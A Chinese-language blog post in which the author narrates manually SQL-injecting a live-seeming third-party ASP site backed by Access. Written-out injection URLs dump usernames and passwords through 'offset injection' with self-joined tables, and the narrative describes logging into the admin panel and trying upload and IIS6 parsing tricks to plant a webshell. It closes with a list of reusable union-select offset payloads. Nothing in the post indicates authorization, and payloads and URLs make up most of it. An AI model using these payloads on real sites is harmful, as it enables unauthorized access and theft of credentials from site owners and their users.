关于access sql 偏移注入技术实战

文章作者:F4usT
这两天没事，无聊的练习下手工注入。随便找了一个网址输入“”报错！然后and 发现存在注入！然后判断下数据库类型当然是access的了，然后判断 十四个字段
http://www.f4le.com/show_new.asp?bh=397%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14%20from%20users

然后按常规的思路开始爆用户名，密码字段，但是都不行，然后尝试爆破，但是还是不行，然后百度找了下关于注入的语句，发现便宜注入。尝试、、但不成功，随在群里求助，在这里感谢丶反方向的钟！
他还是用的偏移注入。他发来他的 我才知到我的注入语句写错了。。或者说我只是死套老路子吧。然后用他的注入语句成功获取用户名 密码。
http://www.f4le.com/show_new.asp?bh=394%20and%201=2%20union%20select%20*%20from%20(users%20as%20a%20inner%20join%20users%20as%20b%20o

找到后台登陆，但发现功能过于简单 如图

但是ewe 编辑器提示是hxcms 7.5免费版 有原名 和远程上传 随暗喜，iis6.的服务器，解析漏洞，上传图片发现还是被重命名了，然后测试远程上传的oday，但是名字还是只取文件的后缀然后重命名，郁闷死！所以真的不好拿到shell了，然后想下载7.5的源码看看，但网上没找到7.5免费版的源码，所以只能放弃了 。
其实主要学习的是注入语句关于偏移注入 稍微总结了下
大致的语句如下
and 1=2 union select * from (users as a inner join users as b on a.id=b.id )
and 1=2 union select 1,* from (users as a inner join users as b on a.id=b.id )
and 1=2 union select 1,2,* from (users as a inner join users as b on a.id=b.id )
and 1=2 union select 1,2,3,* from (users as a inner join users as b on a.id=b.id )
and 1=2 union select 1,2,3,*-1,* from (users as a inner join users as b on a.id=b.id )
and 1=2 union select 1,a.id,* from (users as a inner join users as b on a.id=b.id )
and 1=2 union select 1,a.id,b.id,* from (users as a inner join users as b on a.id=b.id )
and 1=2 union select *from( from (users as a inner join users as b on a.id=b.id )
and 1=2 union select * from ((select * from admin) as a inner join (select * from admin) as b on a.id=b.id) inner join (select id from admin) as c on c.id=a.id
等等
ps:要灵活运用！！！